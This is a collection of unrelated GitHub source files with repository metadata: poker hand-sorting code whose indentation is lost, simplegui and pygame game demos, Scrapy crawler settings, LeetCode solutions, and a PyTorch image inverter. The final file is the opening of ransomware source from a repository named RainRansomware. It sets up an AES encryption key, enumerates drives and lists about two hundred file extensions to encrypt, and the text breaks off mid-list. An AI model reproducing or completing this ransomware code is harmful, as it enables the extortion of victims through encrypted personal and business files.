# one,two,three,four = select_pair(['&2', '*2', '$2', '#2', '*7', '*K', '#K', '*K', '#K', '*A','$A'])
# print(one)
# print(two)
# print(three)
# print(four)
#Remove duplicate ranks, used to check for straights
def remove_same_card(card_list):
#print(card_list)
card_dict = {'2':2,'3':3,'4':4,'5':5,'6':6,'7':7,'8':8,'9':9,'10':10,'J':11,'Q':12,'K':13,'A':14} #大小比对
number_card_list = []
digital_card_list = []
for item in card_list:
number_card_list.append(item[1:])
number_card_list = sorted(set(number_card_list),key=number_card_list.index)
for item in number_card_list:
digital_card_list.append(card_dict[item])
#print(digital_card_list)
return digital_card_list
#print(remove_same_card(['&2', '*2', '$2', '#2', '*7', '*K', '#K', '*K', '#K', '*A','$A']))
#Pick out a straight (by rank values)
def select_digital(digital_card_list):
for i in range(len(digital_card_list)-4):
if(digital_card_list[i] == digital_card_list[i+4]+4):
            #this proves a straight exists
            return digital_card_list[i]
    #this only proves a straight exists; it does not return the actual cards
    return False
#Pick out a straight
def select_straight(card_list):
digital_card_list = remove_same_card(card_list)
digital = select_digital(digital_card_list)
if(digital == False):
return []
card_dict = {'2':2,'3':3,'4':4,'5':5,'6':6,'7':7,'8':8,'9':9,'10':10,'J':11,'Q':12,'K':13,'A':14} #大小比对
straight_card_list = []
for i in range(len(card_list)):
if(card_dict[card_list[i][1:]] == digital):
straight_card_list.append(card_list[i])
digital = digital - 1
if(len(straight_card_list) == 5):
break
return straight_card_list
#print(select_straight(['&A', '*K', '$Q', '#J', '*10', '*9', '#8', '*7', '#6', '*5','$4']))
#Check whether a special hand type exists
#Abandoned -- not implemented
# def if_is_special_card():
#     special_card = []
#     return special_card
#Find the strongest option among the remaining cards
#Both the back hand and the middle hand can use this algorithm
#The front hand does not need its own function: whatever is left after removing the middle and back hands is the front hand
#Main selection function
def select_best(card_list):
card_dict = {'2':2,'3':3,'4':4,'5':5,'6':6,'7':7,'8':8,'9':9,'10':10,'J':11,'Q':12,'K':13,'A':14} #大小比对
# first_card_list = []
# second_card_list = []
# third_card_list = []
best_card_list = [] #要换成空列表
if(len(card_list) == 3):
best_card_list = card_list
#print("乌龙")
return best_card_list #这个return不太行
#前期准备
spade_list,heart_list,diamond_list,club_list = select_suit(card_list)
one_list,two_list,three_list,four_list = select_pair(card_list)
    #Ranking order: straight flush -> bomb -> full house -> flush -> straight -> three of a kind -> two pair -> pair -> high card
    #Straights were tricky to handle -- solved now
    #Needs rethinking
    #Straight flush
if(len(spade_list) >= 5):
best_card_list = select_straight(spade_list)
elif(len(heart_list) >= 5):
best_card_list = select_straight(heart_list)
elif(len(diamond_list) >= 5):
best_card_list = select_straight(diamond_list)
else:
best_card_list = select_straight(club_list)
    if(len(best_card_list) != 0): #this check is not great
        #print("straight flush")
        return best_card_list
    #Bomb (four of a kind)
if(len(four_list) != 0):
best_card_list = four_list[0]
if(len(one_list) != 0):
best_card_list.append(one_list[-1][0])
#print("炸弹")
return best_card_list
elif(len(two_list) != 0):
best_card_list.append(two_list[-1][0])
#print("炸弹")
return best_card_list
else:
best_card_list.append(three_list[-1][0])
#print("炸弹")
return best_card_list
    #Full house
if(len(two_list) != 0 and len(three_list) != 0):
best_card_list = three_list[0] + two_list[-1]
#print("葫芦")
return best_card_list
elif(len(two_list) == 0 and len(three_list) >= 2):
best_card_list = three_list[0] + three_list[1][:1]
#print("葫芦")
return best_card_list
    #Flush
if(len(spade_list) >= 5):
best_card_list = spade_list[:5]
if(len(heart_list) >= 5):
if(len(best_card_list) != 0):
# print(1)
# print(best_card_list)
if(card_dict[best_card_list[0][1:]] < card_dict[heart_list[0][1:]]):
best_card_list = heart_list[:5]
else:
best_card_list = heart_list[:5]
if(len(diamond_list) >= 5):
if(len(best_card_list) != 0):
# print(2)
# print(best_card_list)
if(card_dict[best_card_list[0][1:]] < card_dict[diamond_list[0][1:]]):
best_card_list = diamond_list[:5]
else:
best_card_list = diamond_list[:5]
if(len(club_list) >= 5):
if(len(best_card_list) != 0):
# print(3)
# print(best_card_list)
if(card_dict[best_card_list[0][1:]] < card_dict[club_list[0][1:]]):
best_card_list = club_list[:5]
else:
best_card_list = club_list[:5]
if(len(best_card_list) != 0):
#print("同花")
return best_card_list
    #Straight
best_card_list = select_straight(card_list)
if(len(best_card_list) != 0):
#print("顺子")
return best_card_list
    #Three of a kind
if(len(three_list) != 0):
best_card_list = three_list[0] + one_list[0] + one_list[1]
#print("三条")
return best_card_list
    #Two pair
if(len(two_list) >= 2):
best_card_list = two_list[0] + two_list[1] + one_list[0]
#print("两对")
return best_card_list
    #Pair
if(len(two_list) == 1):
best_card_list = two_list[0] + one_list[0] + one_list[1] + one_list[2]
#print("对子")
return best_card_list
    #High card (single cards)
for item in one_list:
best_card_list = best_card_list + item
if(len(best_card_list) == 5):
break
#print("乌龙")
return best_card_list
def main_function(card_string):
    #Variable definitions
    #It seems these variable definitions are not really needed
card_list = []
card_string_list = []
    #Front / middle / back hands
first_card_list = []
second_card_list = []
third_card_list = []
    #Four suits
# spade_list = [] #$
# heart_list = [] #&
# diamond_list = [] ##
# club_list = [] #*
    #Get the dealt cards
    #todo
#card_string = "#A $2 #3 $4 #5 $6 #7 $8 #9 $10 #J $Q #K" #测试
card_list = stl(card_string)
    #Arrange the hand
    #Sort
card_list = seq(card_list)
#spade_list,heart_list,diamond_list,club_list = select_suit(card_list)
    # #Back hand
    #print("back hand")
third_card_list = select_best(card_list)
    card_list = cut_card(card_list,third_card_list) #does converting to a set keep the order? this was an issue -- solved
third_card_list.reverse()
third_card_string = " ".join(third_card_list)
#print(third_card_string)
    #Middle hand
    #print("middle hand")
second_card_list = select_best(card_list)
card_list = cut_card(card_list,second_card_list)
second_card_list.reverse()
second_card_string = " ".join(second_card_list)
#print(second_card_string)
    #Front hand
    #print("front hand")
first_card_list = select_best(card_list)
first_card_list.reverse()
first_card_string = " ".join(first_card_list)
#print(first_card_string)
#first_card_string,second_card_string,third_card_string
card_string_list.append(first_card_string)
card_string_list.append(second_card_string)
card_string_list.append(third_card_string)
#print(card_string_list)
return card_string_list
main_function("*4 *3 &4 $Q *Q &10 &A *8 *6 *5 #4 *9 $J")
main_function("&5 $9 &K *7 #Q &J &7 &4 $5 $A *9 $8 #2")
main_function("&5 #J #A &8 &K $7 #3 *8 #8 #5 $6 *3 #2")
main_function("&10 &4 #Q *A *10 #K $4 $K #2 $J &K $3 $6")
main_function("#10 *6 $Q *K &Q #Q *10 *J &5 $3 $8 $K $J")
main_function("#K #4 *10 &Q $6 $J #8 *8 $5 &10 $3 &K $Q")
main_function("$9 $J &A #3 *9 #J *8 $6 #4 $K #7 &9 $7")
main_function("$10 $3 #6 &10 $4 #10 *J $2 &2 *10 $6 *6 $8")
main_function("#K &8 #10 $3 &A #9 *5 &6 *10 $6 #7 *J $J")
main_function("$6 #Q &4 #10 *J &3 *A *2 #J &K *10 $2 &Q")
main_function("#5 #K &2 $K *J &7 #6 *6 *Q *4 &5 &6 #9")
main_function("*9 *5 #4 &J *Q #3 *6 $J $K #7 #Q $Q *10")
main_function("#5 $2 &10 #8 &J *4 *Q $4 *3 &K &8 $Q #9")
main_function("$K #5 &5 *10 &4 #J &A $6 *4 #Q $2 #7 &K")
main_function("$8 &3 #9 $9 $J $Q *3 #6 #Q &K &J &2 #K")
main_function("*7 #3 *5 &3 #7 $8 &5 &J $4 &9 $Q $K *Q")
main_function("#A $2 #3 $4 #5 $6 #7 $8 #9 $10 #J $Q #K")
main_function("#A #2 #3 #4 #5 #6 #7 #8 #9 #10 #J #Q #K")
|
[
"noreply@github.com"
] |
1647790440.noreply@github.com
|
830d131f23bacfdfed88af9c12a931039c242ac7
|
55c78ec3a7356827c3d481cf71a9c293c3976da7
|
/3-canvas-drawing.py
|
c8dff50a0dac6c82b0ce4548469c5859eb85d789
|
[] |
no_license
|
BobbyJoeSmith3/interactive-python-code-examples
|
238041dba027a19320fcd3203ef58d4252629228
|
6784d1cd1b3a2009fe99dfd0b4f2a98db0997b97
|
refs/heads/master
| 2016-09-01T05:27:59.991367
| 2015-11-23T09:04:36
| 2015-11-23T09:04:36
| 43,130,153
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,562
|
py
|
#############################################/
# first example of drawing on the canvas
#############################################/
import simplegui
# define draw handler
def draw(canvas):
canvas.draw_text("Hello!",[100, 100], 24, "White")
canvas.draw_circle([100, 100], 2, 2, "Red")
# create frame
frame = simplegui.create_frame("Text drawing", 300, 200)
# register draw handler
frame.set_draw_handler(draw)
# start frame
frame.start()
#############################################/
# second example of drawing on the canvas
#############################################/
# example of drawing operations in simplegui
# standard HMTL color such as "Red" and "Green"
# note later drawing operations overwrite earlier drawing operations
import simplegui
# Handler to draw on canvas
def draw(canvas):
canvas.draw_circle([100, 100], 50, 2, "Red", "Pink")
canvas.draw_circle([300, 300], 50, 2, "Red", "Pink")
canvas.draw_line([100, 100],[300, 300], 2, "Black")
canvas.draw_circle([100, 300], 50, 2, "Green", "Lime")
canvas.draw_circle([300, 100], 50, 2, "Green", "Lime")
canvas.draw_line([100, 300],[300, 100], 2, "Black")
canvas.draw_polygon([[150, 150], [250, 150], [250, 250], [150, 250]], 2,
"Blue", "Aqua")
canvas.draw_text("An example of drawing", [60, 385], 24, "Black")
# Create a frame and assign callbacks to event handlers
frame = simplegui.create_frame("Home", 400, 400)
frame.set_draw_handler(draw)
frame.set_canvas_background("Yellow")
# Start the frame animation
frame.start()
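# Note: simplegui is the CodeSkulptor (browser) module, so these examples will not
# import on plain CPython. A common workaround -- an assumption, not part of the
# original file -- is the SimpleGUICS2Pygame package:
#   import SimpleGUICS2Pygame.simpleguics2pygame as simplegui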
|
[
"bobbyjoe@codeforprogress.org"
] |
bobbyjoe@codeforprogress.org
|
a200e9f8c40e06ecc7a820150987c01b6767679e
|
4d7aceb626d3b403db87ea828b81afed3c8a4b72
|
/deck_chores/indexes.py
|
2a65d8ca5f93d9349a0e9dc60278ab50a90787ee
|
[
"ISC"
] |
permissive
|
geraldaistleitner/swarmcron
|
b8ac0f381d581eb6b815cba83dc755f0c16afe2d
|
65af51bf01b209c5a4ffc5f1c9517058a533dae4
|
refs/heads/master
| 2021-10-07T17:06:38.708069
| 2021-09-29T14:13:29
| 2021-09-29T14:13:29
| 170,665,879
| 0
| 1
|
ISC
| 2021-09-29T14:13:30
| 2019-02-14T09:39:36
|
Python
|
UTF-8
|
Python
| false
| false
| 188
|
py
|
from typing import Dict # noqa: F401
locking_container_to_services_map = {} # type: Dict[str, str]
""" A mapping of locking container ids to service ids whose jobs have been added. """
|
[
"funkyfuture@riseup.net"
] |
funkyfuture@riseup.net
|
b4ee29843b0cf4d85378ebc64bb85e605f056a44
|
5fc4fb33fb9c5f4c98c5172286a0884874b6fe34
|
/games/snake/snake-game.py
|
afca8bebc995434c2c5d2ce6fe3183c74af26eac
|
[] |
no_license
|
AdrianoPereira/playground
|
f1358324502c2cef81c8bfd9aa3e1503c4e0f08f
|
ccf5fbe4def6aeba1bd04527e525b7c61494f9ef
|
refs/heads/master
| 2022-07-09T23:32:41.991799
| 2020-05-11T20:08:11
| 2020-05-11T20:08:11
| 263,137,001
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,789
|
py
|
import pygame
import random
import sys
# from pygame.locals import *
pygame.init()
pygame.display.set_caption("Adriano\'s Playground - Snake Game")
SIZE_WINDOW = (600, 600)
SIZE_BLOCK = (10, 10)
COLOR_SNAKE = (255, 255, 255)
COLOR_APPLE = (255, 0, 0)
COLOR_TEXT = (0, 255, 0)
COLOR_BKG = (0, 0, 0)
GRID_COLOR = (30, 30, 30)
UP, RIGHT, DOWN, LEFT = 0, 1, 2, 3
def generate_apple():
def random_number():
ans = random.randint(-10, 590)
rem = ans%10
return ans+10-rem
x = random_number()
y = random_number()
return (x, y)
def eat_apple(snake, apple):
return snake[0][0] == apple[0] and snake[0][1] == apple[1]
def detect_colision(snake):
if snake[0][0] == SIZE_WINDOW[0] or snake[0][1] == SIZE_WINDOW[1]:
return True
if snake[0][0] < 0 or snake[0][1] < 0:
return True
for x in range(1, len(snake)-1):
if snake[0][0] == snake[x][0] and snake[0][1] == snake[x][1]:
return True
return False
screen = pygame.display.set_mode(SIZE_WINDOW)
snake = [(200, 200), (210, 200), (220, 200)]
snake_sprite = pygame.Surface(SIZE_BLOCK)
snake_sprite.fill(COLOR_SNAKE)
apple_position = generate_apple()
# apple_sprite = pygame.Surface(SIZE_BLOCK)
apple_sprite = pygame.image.load("assets/apple.gif")
apple_sprite = pygame.transform.scale(apple_sprite, SIZE_BLOCK)
# apple_sprite.fill(COLOR_APPLE)
head_sprites = ["assets/head-up.png", "assets/head-right.png",
"assets/head-down.png", "assets/head-left.png"]
body_sprites = ["assets/body-v.png", "assets/body-h.png"]
font = pygame.font.Font('freesansbold.ttf', 14)
score = 0
movement = LEFT
clock = pygame.time.Clock()
snapshot = 1
while True:
clock.tick(10)
pygame.image.save(screen, "snapshots/snake-%s.png"%(str(snapshot).zfill(5)))
snapshot += 1
for event in pygame.event.get():
if event.type == pygame.QUIT:
pygame.quit()
sys.exit()
if event.type == pygame.KEYDOWN:
if event.key == pygame.K_UP and movement is not DOWN:
movement = UP
if event.key == pygame.K_RIGHT and movement is not LEFT:
movement = RIGHT
if event.key == pygame.K_DOWN and movement is not UP:
movement = DOWN
if event.key == pygame.K_LEFT and movement is not RIGHT:
movement = LEFT
if eat_apple(snake, apple_position):
apple_position = generate_apple()
snake.append((0, 0))
score += 1
if detect_colision(snake):
print('game over')
for x in range(len(snake)-1, 0, -1):
snake[x] = (snake[x-1][0], snake[x-1][1])
if movement == UP:
snake[0] = (snake[0][0], snake[0][1]-10)
if movement == RIGHT:
snake[0] = (snake[0][0]+10, snake[0][1])
if movement == DOWN:
snake[0] = (snake[0][0], snake[0][1]+10)
if movement == LEFT:
snake[0] = (snake[0][0]-10, snake[0][1])
screen.fill(COLOR_BKG)
for x in range(0, 600, 10):
pygame.draw.line(screen, GRID_COLOR, (x, 0), (x, 600))
pygame.draw.line(screen, GRID_COLOR, (0, x), (600, x))
score_text = font.render('Score: %s'%str(score).zfill(3), True, COLOR_TEXT)
score_rect = score_text.get_rect()
score_rect.topleft = (SIZE_WINDOW[0]-80, 10)
screen.blit(score_text, score_rect)
screen.blit(apple_sprite, apple_position)
head_snake = pygame.image.load(head_sprites[movement])
head_snake = pygame.transform.scale(head_snake, SIZE_BLOCK)
screen.blit(head_snake, snake[0])
body_snake = pygame.image.load(body_sprites[movement%2])
body_snake = pygame.transform.scale(body_snake, SIZE_BLOCK)
for pos in range(1, len(snake)):
screen.blit(body_snake, snake[pos])
pygame.display.update()
|
[
"adriano.almeida@inpe.br"
] |
adriano.almeida@inpe.br
|
f610ffc8ef9f81715405b80633828b49bbe5d58a
|
f725991c3e14bceb09ad5a9872ee17b39f16f58b
|
/rlocker_crawler/rlocker_crawler/settings.py
|
3fde3d55df5f9b467b9764230b534edfb6c62be3
|
[] |
no_license
|
rabbicse/scrapy-crawlers
|
757e3ce83610f3ea5fc899f611f274e7fab9f19d
|
623caa7b45b15efc5ac06edb4badbc1519af46fb
|
refs/heads/master
| 2020-05-17T19:27:30.620907
| 2020-01-28T13:52:11
| 2020-01-28T13:52:11
| 183,915,392
| 2
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 4,737
|
py
|
# -*- coding: utf-8 -*-
# Scrapy settings for rlocker_crawler project
#
# For simplicity, this file contains only settings considered important or
# commonly used. You can find more settings consulting the documentation:
#
# https://doc.scrapy.org/en/latest/topics/settings.html
# https://doc.scrapy.org/en/latest/topics/downloader-middleware.html
# https://doc.scrapy.org/en/latest/topics/spider-middleware.html
BOT_NAME = 'rlocker_crawler'
SPIDER_MODULES = ['rlocker_crawler.spiders']
NEWSPIDER_MODULE = 'rlocker_crawler.spiders'
# Crawl responsibly by identifying yourself (and your website) on the user-agent
# USER_AGENT = 'rlocker_crawler (+http://www.yourdomain.com)'
# Obey robots.txt rules
ROBOTSTXT_OBEY = False
# Configure maximum concurrent requests performed by Scrapy (default: 16)
CONCURRENT_REQUESTS = 1
# Configure a delay for requests for the same website (default: 0)
# See https://doc.scrapy.org/en/latest/topics/settings.html#download-delay
# See also autothrottle settings and docs
DOWNLOAD_DELAY = 3
# The download delay setting will honor only one of:
CONCURRENT_REQUESTS_PER_DOMAIN = 1
CONCURRENT_REQUESTS_PER_IP = 1
# Disable cookies (enabled by default)
COOKIES_ENABLED = False
# Disable Telnet Console (enabled by default)
TELNETCONSOLE_ENABLED = False
# Override the default request headers:
DEFAULT_REQUEST_HEADERS = {
'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
'Upgrade-Insecure-Requests': '1',
'Connection': 'keep-alive',
'Accept-Encoding': 'gzip, deflate, br',
'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36',
}
# Enable or disable spider middlewares
# See https://doc.scrapy.org/en/latest/topics/spider-middleware.html
# SPIDER_MIDDLEWARES = {
# 'rlocker_crawler.middlewares.RlockerCrawlerSpiderMiddleware': 543,
# }
# Enable or disable downloader middlewares
# See https://doc.scrapy.org/en/latest/topics/downloader-middleware.html
# DOWNLOADER_MIDDLEWARES = {
# 'rlocker_crawler.middlewares.RlockerCrawlerDownloaderMiddleware': 543,
# 'scrapy.downloadermiddlewares.httpproxy.HttpProxyMiddleware': 100,
# 'rlocker_crawler.random_proxies.RandomProxy': 110
# }
# Enable or disable extensions
# See https://doc.scrapy.org/en/latest/topics/extensions.html
# EXTENSIONS = {
# 'scrapy.extensions.telnet.TelnetConsole': None,
# }
# Configure item pipelines
# See https://doc.scrapy.org/en/latest/topics/item-pipeline.html
ITEM_PIPELINES = {
'rlocker_crawler.pipelines.RlockerCrawlerPipeline': 300,
}
# Enable and configure the AutoThrottle extension (disabled by default)
# See https://doc.scrapy.org/en/latest/topics/autothrottle.html
# AUTOTHROTTLE_ENABLED = True
# The initial download delay
# AUTOTHROTTLE_START_DELAY = 5
# The maximum download delay to be set in case of high latencies
# AUTOTHROTTLE_MAX_DELAY = 60
# The average number of requests Scrapy should be sending in parallel to
# each remote server
# AUTOTHROTTLE_TARGET_CONCURRENCY = 1.0
# Enable showing throttling stats for every response received:
# AUTOTHROTTLE_DEBUG = False
DOWNLOAD_TIMEOUT = 60
# Retry many times since proxies often fail
RETRY_TIMES = 5
# Retry on most error codes since proxies fail for different reasons
RETRY_HTTP_CODES = [500, 503, 504, 400, 403, 408, 410, 429]
# Enable and configure HTTP caching (disabled by default)
# See https://doc.scrapy.org/en/latest/topics/downloader-middleware.html#httpcache-middleware-settings
# HTTPCACHE_ENABLED = True
# HTTPCACHE_EXPIRATION_SECS = 0
# HTTPCACHE_DIR = 'httpcache'
# HTTPCACHE_IGNORE_HTTP_CODES = []
# HTTPCACHE_STORAGE = 'scrapy.extensions.httpcache.FilesystemCacheStorage'
# Proxy list containing entries like
# http://host1:port
# http://username:password@host2:port
# http://host3:port
# ...
PROXY_LIST = 'proxy.txt'
# Proxy mode
# 0 = Every requests have different proxy
# 1 = Take only one proxy from the list and assign it to every requests
# 2 = Put a custom proxy to use in the settings
PROXY_MODE = 0
DATABASE = {'drivername': 'mysql',
'host': '127.0.0.1',
'port': '3306',
'username': 'admin', # fill in your username here
'password': 'password', # fill in your password here
'database': 'scrapy'}
FEED_EXPORTERS = {
'csv': 'rlocker_crawler.exporters.QuoteAllCsvItemExporter',
}
'''
1) professionalgardening.com (done)
2) megawatthydro.com (done)
3)Biofloral.com (done)
4)hydrotekhydroponics.com (done)
5)mygreenplanet.com (done)
6)hawthornegc.ca (done)
7) eddiswholesale.com (done)
8) ledab.ca (done)
9) naturalinsectcontrol.com
10) growlights.ca (done)
11) https://truenorthseedbank.com/ (done)
'''
|
[
"rabbi.se@gmail.com"
] |
rabbi.se@gmail.com
|
bc8b36a424ab98f4770ebae36926e8fe9c9b0733
|
72b77f97876983025eb05a5aa1d6f248a1be3074
|
/longest_continuous_increasing_subsequence.py
|
e6b446941c7c22169713dfd26ac166f4ad59fdd0
|
[
"Apache-2.0"
] |
permissive
|
erjan/coding_exercises
|
4c6bccb2cdac65ccbc3107a482914275ecd157f7
|
68dac358a6d4dabd41d47dbd4addb2ec50e0ca11
|
refs/heads/master
| 2023-09-02T07:25:30.886175
| 2023-08-27T06:13:06
| 2023-08-27T06:13:06
| 236,281,070
| 5
| 0
|
Apache-2.0
| 2020-05-05T15:08:49
| 2020-01-26T07:32:09
|
Python
|
UTF-8
|
Python
| false
| false
| 1,171
|
py
|
'''
Given an unsorted array of integers nums, return the
length of the longest continuous increasing subsequence (i.e. subarray). The subsequence
must be strictly increasing.
A continuous increasing subsequence is defined
by two indices l and r (l < r) such that it is [nums[l], nums[l + 1], ..., nums[r - 1], nums[r]] and for each l <= i < r, nums[i] < nums[i + 1].
'''
class Solution:
def findLengthOfLCIS(self, nums: List[int]) -> int:
c = 1
maxcount = 0
for i in range(1, len(nums)):
if nums[i-1] < nums[i]:
c += 1
else:
maxcount = max(maxcount, c)
c = 1
res = max(c, maxcount)
print(res)
return res
# --------------------------------
#my own solution
class Solution:
def findLengthOfLCIS(self, nums: List[int]) -> int:
best_r = 1
cur_r = 1
for i in range(len(nums)-1):
if nums[i] < nums[i+1]:
cur_r += 1
if cur_r > best_r:
best_r = cur_r
else:
cur_r = 1
print(best_r)
return best_r
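# Quick sanity check (a sketch, not part of the original submission):
#   assert Solution().findLengthOfLCIS([1, 3, 5, 4, 7]) == 3   # [1, 3, 5]
#   assert Solution().findLengthOfLCIS([2, 2, 2, 2]) == 1      # must be strictly increasing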
|
[
"noreply@github.com"
] |
erjan.noreply@github.com
|
b984fad51d38c97d1517e90fadc6e66c577c4301
|
913b8f04184701fdb5694934202fa2df520c25bd
|
/105/submissions/save1_nopass.py
|
cd61998f18643868353e99fce4ea011f987a07d1
|
[] |
no_license
|
demarcoz/bitesofpy
|
f08d6bda1d2ad791692ba5fee2657da7010de093
|
efd25df028c1205030c3331d6e1c6994bbad3e64
|
refs/heads/master
| 2021-07-08T01:03:26.552573
| 2020-12-03T19:06:31
| 2020-12-03T19:06:31
| 214,622,046
| 0
| 0
| null | 2020-10-04T17:15:28
| 2019-10-12T09:49:03
|
Python
|
UTF-8
|
Python
| false
| false
| 1,122
|
py
|
from string import ascii_lowercase
text = """
One really nice feature of Python is polymorphism: using the same operation
on different types of objects.
Let's talk about an elegant feature: slicing.
You can use this on a string as well as a list for example
'pybites'[0:2] gives 'py'.
The first value is inclusive and the last one is exclusive so
here we grab indexes 0 and 1, the letter p and y.
When you have a 0 index you can leave it out so can write this as 'pybites'[:2]
but here is the kicker: you can use this on a list too!
['pybites', 'teaches', 'you', 'Python'][-2:] would gives ['you', 'Python']
and now you know about slicing from the end as well :)
keep enjoying our bites!
"""
def slice_and_dice(text: str = text) -> list:
    """Get a list of words from the passed in text.
    See the Bite description for step by step instructions"""
    results = []
    # work line by line, stripping leading whitespace first
    for line in text.strip().split('\n'):
        line = line.lstrip()
        # only lines that start with a lowercase character count
        if line and line[0].islower():
            # keep the last word, dropping trailing '.' or '!'
            results.append(line.split()[-1].rstrip('.!'))
    return results
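A minimal illustrative call (added here; the output depends on the module-level text above):
# illustrative call, using the module-level `text` defined earlier in the file
print(slice_and_dice())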
|
[
"marco@dezeeuw.nl"
] |
marco@dezeeuw.nl
|
d17c40169309fae699d24035ed83d100dd1e82cf
|
4dc6ac7f6242f86abdc0db1147bcb4768649500d
|
/colab_files/vgg_inverter.py
|
192e290016891a5eb71ce2dbd7b153f7a5d9b29d
|
[] |
no_license
|
jonshamir/vgg_feat_gen
|
1c6fbef589c32246cf428083b155cccb94cf4ff1
|
2f288cb3069fdcf585c7ef431ed67d7423bab268
|
refs/heads/master
| 2020-07-04T16:03:56.586055
| 2019-12-01T17:40:26
| 2019-12-01T17:40:26
| 202,321,819
| 1
| 1
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,412
|
py
|
import torch
import torch.nn as nn
import torchvision.utils as vutils
import os
DEVICE = torch.device("cuda:0" if torch.cuda.is_available() else "cpu")
class Generator(nn.Module):
"""
Convolutional Generator
"""
def __init__(self, nc=3):
super(Generator, self).__init__()
self.conv = nn.Sequential(
# 7 -> 7
nn.ConvTranspose2d(512, 256, 3, stride=1, padding=1, bias=False),
nn.BatchNorm2d(256),
nn.ReLU(),
# 7 -> 14
nn.ConvTranspose2d(256, 128, 4, stride=2, padding=1, bias=False),
nn.BatchNorm2d(128),
nn.ReLU(),
# 14 -> 28
nn.ConvTranspose2d(128, 64, 4, stride=2, padding=1, bias=False),
nn.BatchNorm2d(64),
nn.ReLU(),
# 28 -> 56
nn.ConvTranspose2d(64, nc, 4, stride=2, padding=1, bias=False),
nn.Tanh(),
)
def forward(self, input):
# input: (N, 100)
out = self.conv(input)
return out
G = Generator().to(DEVICE)
dirname = os.path.dirname(__file__)
filename = os.path.join(dirname, 'inverter_frogs_normalized.pkl')
G.load_state_dict(torch.load(filename))
G.eval()
def features2images(feats):
fake = G(feats).detach().cpu()
img = vutils.make_grid(fake, normalize=True, pad_value=1)
return img.permute(1, 2, 0) # reorganize image channel order
|
[
"jon.shamir@gmail.com"
] |
jon.shamir@gmail.com
|
1c3ebd9442a77a92bbfe5ad5f27147202fff595b
|
85821b9fe24a19d59704814f6440c9aa5023cdcd
|
/dictionary.py
|
8c0b8d1bc46897ac4752076fa397d668cc6da91b
|
[] |
no_license
|
Tunna/Tuples_Dictionaries
|
c87c5e3f8ff32ef1191e6051669567fb9eac3161
|
32262839f8f7170417de9852aab90d2563bce38c
|
refs/heads/master
| 2020-12-29T01:10:36.525591
| 2016-08-23T06:15:51
| 2016-08-23T06:15:51
| 65,349,909
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 408
|
py
|
# def name_count(name):
#     count_dictionary = {}
#     for letter in name:
#         if letter in count_dictionary:
#             count_dictionary[letter] += 1
#         else:
#             count_dictionary[letter] = 1
#     print(count_dictionary)
# name_count("trushna")
fruit_cost = {"banana": 4, "apple": 2, "orange": 1.5, "pear": 3}
maxm = max(fruit_cost.values())
# print every fruit whose cost equals the maximum
for key, value in fruit_cost.items():
    if value == maxm:
        print(key)
|
[
"tmajmundar@gmail.com"
] |
tmajmundar@gmail.com
|
635677878fedc186df66df534c9b25b1c22b5c01
|
868bbd26e5e9674b879278d4429d435c91e1b4f0
|
/Source-Code/Functions/Encrypt_Func.py
|
ca95c2a85371665cd1725fa6fc0d60849424bdcb
|
[] |
no_license
|
shariarislam/RainRansomware
|
276ee99b8c1dcd9c7181bc892823d6ac5b38746d
|
d2991a2f7a899d6ffb901017524cf7547dac77ee
|
refs/heads/master
| 2020-09-10T06:52:03.716471
| 2019-10-30T02:15:43
| 2019-10-30T02:15:43
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 7,479
|
py
|
import os,platform,glob,sys,string
from os import system as sis
from Crypto.Cipher import AES
from Crypto import Random
BLOCK_SIZE = 32
s = platform.system()
k = Random.new().read(BLOCK_SIZE)
aes = AES.new(k,AES.MODE_ECB)
drives = list(string.ascii_uppercase)
ext=['*.php','*.pl','*.7z','*.rar','*.m4a','*.wma','*.avi','*.wmv','*.csv','*.d3dbsp','*.sc2save','*.sie','*.sum','*.ibank','*.t13','*.t12','*.qdf','*.gdb','*.tax'
,'*.pkpass','*.bc6','*.bc7','*.bkp','*.qic','*.bkf','*.sidn','*.sidd','*.mddata','*.itl','*.itdb','*.icxs','*.hvpl','*.hplg','*.hkdb','*.mdbackup','*.syncdb','*.gho'
,'*.cas','*.svg','*.map','*.wmo','*.itm','*.sb','*.fos','*.mcgame','*.vdf','*.ztmp','*.sis','*.sid','*.ncf','*.menu','*.layout','*.dmp','*.blob','*.esm','*.001'
,'*.vtf','*.dazip','*.fpk','*.mlx','*.kf','*.iwd','*.vpk','*.tor','*.psk','*.rim','*.w3x','*.fsh','*.ntl','*.arch00','*.lvl','*.snx','*.cfr','*.ff','*.vpp_pc','*.lrf'
,'*.m2','*.mcmeta','*.vfs0','*.mpqge','*.kdb','*.db0','*.mp3','*.upx','*.rofl','*.hkx','*.bar','*.upk','*.das','*.iwi','*.litemod','*.asset','*.forge','*.ltx','*.bsa'
,'*.apk','*.re4','*.sav','*.lbf','*.slm','*.bik','*.epk','*.rgss3a','*.pak','*.big','*.unity3d','*.wotreplay','*.xxx','*.desc','*.py','*.m3u','*.flv','*.js','*.css'
,'*.rb','*.png','*.jpeg','*.p7c','*.p7b','*.p12','*.pfx','*.pem','*.crt','*.cer','*.der','*.x3f','*.srw','*.pef','*.ptx','*.r3d','*.rw2','*.rwl','*.raw','*.raf'
,'*.orf','*.nrw','*.mrwref','*.mef','*.erf','*.kdc','*.dcr','*.cr2','*.crw','*.bay','*.sr2','*.srf','*.arw','*.3fr','*.dng','*.jpeg','*.jpg','*.cdr','*.indd','*.ai'
,'*.eps','*.pdf','*.pdd','*.psd','*.dbfv','*.mdf','*.wb2','*.rtf','*.wpd','*.dxg','*.xf','*.dwg','*.pst','*.accdb','*.mdb','*.pptm','*.pptx','*.ppt','*.xlk','*.xlsb'
,'*.xlsm','*.xlsx','*.xls','*.wps','*.docm','*.docx','*.doc','*.odb','*.odc','*.odm','*.odp','*.ods','*.odt','*.sql','*.zip','*.tar','*.tar.gz','*.tgz','*.biz','*.ocx'
,'*.html','*.htm','*.3gp','*.srt','*.cpp','*.mid','*.mkv','*.mov','*.asf','*.mpeg','*.vob','*.mpg','*.fla','*.swf','*.wav','*.qcow2','*.vdi','*.vmdk','*.vmx','*.gpg'
